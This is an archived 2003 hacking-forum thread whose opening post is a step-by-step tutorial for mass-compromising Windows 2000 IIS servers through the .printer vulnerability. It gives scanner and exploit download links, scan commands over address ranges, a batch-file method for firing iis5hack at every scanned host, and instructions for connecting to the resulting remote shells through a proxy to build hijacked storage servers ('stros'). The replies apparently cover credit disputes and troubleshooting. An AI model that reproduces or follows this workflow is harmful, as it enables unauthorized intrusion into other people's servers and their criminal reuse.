hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
GovernmentSecurity.org > The Archives > Exploit Articles
jurk-off
Aug 26 2003, 10:46 AM
Software Required

SFind.exe (scanner) - http://scanspace.myetang.com/else/sfind.rar
iishack.zip (exploit) - http://www.peckerland.com/software/iishack.zip
SecureCRT (telnet client) - https://secure.vandyke.com/vandyke-...ODUCT=SecureCRT
Ultraedit (text editor) - http://www.ultraedit.com/
FlashFXP (FTP Client) - http://www.flashfxp.com/
ServU (FTP Server) - 3.0, regged, compressed, renamed...

Other stuff required

A good socks proxy server
A good scanstro


Step 1 - Scanning

This is pretty easy, find a fast usa / canadian range (exploit doesnt seem to work for eu versions of win2k ), then upload sfind.exe to ur scanstro use a raw command in FlashFXP (ctrl-R):

site exec sfind.exe -pri 10.100.0.1 10.127.255.254

When ur stro is done scanning u should have a 'sfind.txt', download this & open it in ultraedit, look @ ur results


Step 2.1 - Hacking

For this u need iishack.zip make sure ur read the readme.txt then upload iis5hack.exe to ur stro.

Go back to ulraedit, delete the 1st line & the last line, then use the search/replace function (ctrl-r) to turn ur results file into a batch file for iis5hack.exe

In the 'find what:' box type 'find .printer hole', in the 'replace with:' box type '80 2 666' - then click 'replace all'. Then, tick the 'regular expressions' box & in the 'find what' box type '^p', type '^piis5hack ' in the replace with box, then click replace all, then click cancel to close the replace box.

Press ctrl-end to go to the end of ur file & u will see a line with just 'iis5hack ' on it, cut this & paste it on the 1st line of the file, where it is missing.

You should now have a file (big as u like ) with

iis5hack 80 2 666

on each line, save as (F12) iistmp.bat

Upload iistmp.bat to ur stro, then use a raw command (ctrl-r in flashfxp):

site exec cmd /c iistmp.bat > iistmp.txt

Wait a while (have a cup of tea, smoke, etc ) - then go back to ur stro & download iistmp.txt

Open iistmp.txt in ultraedit, then search (alt-F3) for 'good luck', make a list in notepad, or in a sperate file in ultraedit of all the ips that have 'good luck' after them


Step 2.2 - Building the stro

You then need to try to connect to these ips with Secure crt, make sure the protocol is set to telnet, the port is set to 45454, & 'use firewall to connect' is ticked (set up a socks proxy before, in options->global options->firewall). Then paste each ip into the 'hostname' box & click connect. You should be able to connect to abt half ur results.

Now u use the same commands u would use to hack a sql stro, this is a bit easier than using sqlexec, because u can paste multiple lines at once You also have system access, which is nice (better than administrator)

All done? check ur stro is working & post in hacked pubs

myself i don't think this should be in public, if sent to priv, send me with it.....hehe

wanted you guys to know that i've found several with speeds over 8600kbs from ftp.chello.nl



greetz jurk-off


MODERATORS NOTE: I EDITED OUT THE SPECIFIC RANGE AS POSTING REAL IPS IS NOT ALLOWED. PLEASE MUNGE YOUR IPS BEFORE PUTTING THEM IN HERE.
koko
Aug 26 2003, 10:57 AM
the link for secureCRT is dead ! can u do something ? tongue.gif
axl
Aug 26 2003, 11:01 AM
10x 4 the tut...

but iis .printer is dead!
Ripper
Aug 26 2003, 03:20 PM
hmm YOU STOLE THIS ONE FROM ME, YOU ASS dry.gif
this is a little bit USELESS m8... just dumbass style mad.gif
ComSec
Aug 26 2003, 03:24 PM
do you have a link to your article ?

Well.....
Gregor
Aug 26 2003, 04:16 PM
here:

https://secure.vandyke.com/vandyke-bin/down...ODUCT=SecureCRT
Ripper
Aug 26 2003, 05:10 PM
Ofcourse i have a link to my tutorial...:

http://forums.governmentsecurity.org/index...?showtopic=1830

This is just stealing dont you think?
w00dy
Aug 26 2003, 06:21 PM
It looks more like elaborating without giving credit
ComSec
Aug 26 2003, 06:25 PM
thanks ripper.. i see that many exploits each day its hard to keep track...if you see any more rips..then include a link...makes life easier

thanks bud


jurk-off...can you explain why you posted this article without crediting ripper ?

.
jurk-off
Aug 26 2003, 11:06 PM
sjeez im not the only one with this tutor i got it from a friend of mine.


now let ripper explain how he gets his tutor but plz dont think im just "ripping" his post cauze that would be the most stupid thing on earth..

i just have this tutor and didnt saw rippers tutor!!!
ComSec
Aug 27 2003, 12:40 AM
ok...its getting more complicate with each reply...sort it between you via the PM system....cheers

============



on a footnote to ALL....any articles you reproduce here...make sure you include the Author's name credits and links he may provide....same go's for programs and code.

if you not sure then PM a admin member

thanks guys keep up the great work cool.gif cool.gif



============

mumiak
Sep 3 2003, 01:33 PM
is this bug still alive?
I have got lots off good luck but I can't connect to them.
Could someone post that SecureCRT telnet client, I'm using standart windows telnet. And which port should I connect 666 or 45454?
Thanks for help...
Neo_
Sep 6 2003, 10:22 PM
Hello,
I think there is a little mistake.
If i do

iis5hack 192.168.45.65 80 2 666

i have to do

telnet 192.168.45.65 666 and not 45454

I have had 2 Good Luck!!! but i can't telnet.
Igrikk
Oct 5 2003, 10:36 AM
nice tut smile.gif
10x for shareing
virus
Oct 6 2003, 06:46 PM
QUOTE (mumiak @ Sep 3 2003, 05:33 PM)
is this bug still alive?

yeh the bugs still alive and crawling up me pants. I guess the pesticide didn't work that well tongue.gif
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.